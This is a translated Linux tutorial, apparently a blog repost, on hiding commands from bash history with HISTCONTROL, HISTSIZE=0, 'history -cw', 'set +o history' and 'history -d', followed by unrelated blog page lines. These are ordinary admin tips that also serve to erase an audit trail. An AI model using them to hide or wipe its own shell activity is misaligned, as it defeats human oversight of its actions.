But is there a way to control which commands go into the history list and which do not? In other words, can we turn on something like a browser's incognito mode in the Linux terminal? The answer is yes, and depending on what exactly you want, there are many ways to do it. In this article we will discuss some proven methods.

Note: all commands in this article were tested on Ubuntu.

The different approaches

The first two methods were already described in an earlier article. If you already know them, you can skip this part; if not, we recommend reading it carefully.

1. Prefix the command with a space

Yes, you read that right. Put a space in front of a command and the shell ignores it, meaning it will not appear in the history. This only works, however, if the HISTCONTROL environment variable is set to "ignorespace" or "ignoreboth", which in most cases is the default.

So a command like the following (LCTT translator's note: [space] here means typing a space):

    [space]echo "this is a top secret"

will not appear in the history if you previously ran the following command to set the environment variable:

    export HISTCONTROL=ignorespace

The screenshot below shows an example of this approach.

The fourth "echo" command was not recorded in the history because it had a leading space.

2. Disable all history for the current session

If you want to disable all history for a session, simply clear the HISTSIZE environment variable before you start working on the command line. Run the following command to clear it:

    export HISTSIZE=0

HISTSIZE is the number of commands (lines) a bash session can keep in its history list. By default it is set to a non-zero value; on my machine, for example, it is 1000.

So the command above sets it to 0, with the result that nothing is stored in the history until you close the terminal. Remember that this also means you cannot see previously executed commands by pressing the up arrow or running the history command.

3. Clear the entire history after finishing work

This can be seen as another implementation of the previous approach. The only difference is that you run this command after finishing all your work. Here is the command:

    history -cw

As mentioned, this has the same effect as the HISTSIZE method.

4. Turn off history only for your work

Although the methods described above (2 and 3) achieve the goal, they wipe the entire history, which in many cases may not be what we want. Sometimes you may want to keep the history recorded up to the point where you start your command-line work. For such a need, run the following command before you start working:

    [space]set +o history

Note: [space] means a space. Because of the space, this command itself is also not recorded.

The command above temporarily disables the history feature, meaning nothing you do after it is recorded in the history, while everything before it remains in the history list as is.

To re-enable history, run:

    [space]set -o history

This restores the environment to its original state: once you have finished your work, commands run after this one will appear in the history again.

5. Delete specific commands from the history

Now suppose the history already contains some commands you did not want recorded. What do we do in this case? Simple: delete them by hand. Use the following command:

    history | grep "part of command you want to remove"

The command above prints the matching commands from the history, each preceded by a number.

Once you have found the command you want to delete, run the following to remove that specific entry from the history:

    history -d [num]

Below is a screenshot of this example.

The second 'echo' command was deleted successfully.

(LCTT translator's note: if you do not want the above command itself recorded in the history, prefix it with a space.)

Likewise, you can use the up arrow to scroll back through the history. When the command you are interested in appears on the terminal, press "Ctrl + U" to clear the whole line, which also deletes it from the history.

Conclusion

There are many different ways to manipulate the Linux command-line history to suit your needs. Remember, though, that hiding or deleting commands from the history is usually not a good habit, even if there is nothing inherently wrong with it. You must know what you are doing and what consequences it may have.



via: https://www.maketecheasier.com/linux-command-line-history-incognito/

Friday, July 1, 2022

A brief discussion of survival strategies for AWD attack-and-defense competitions
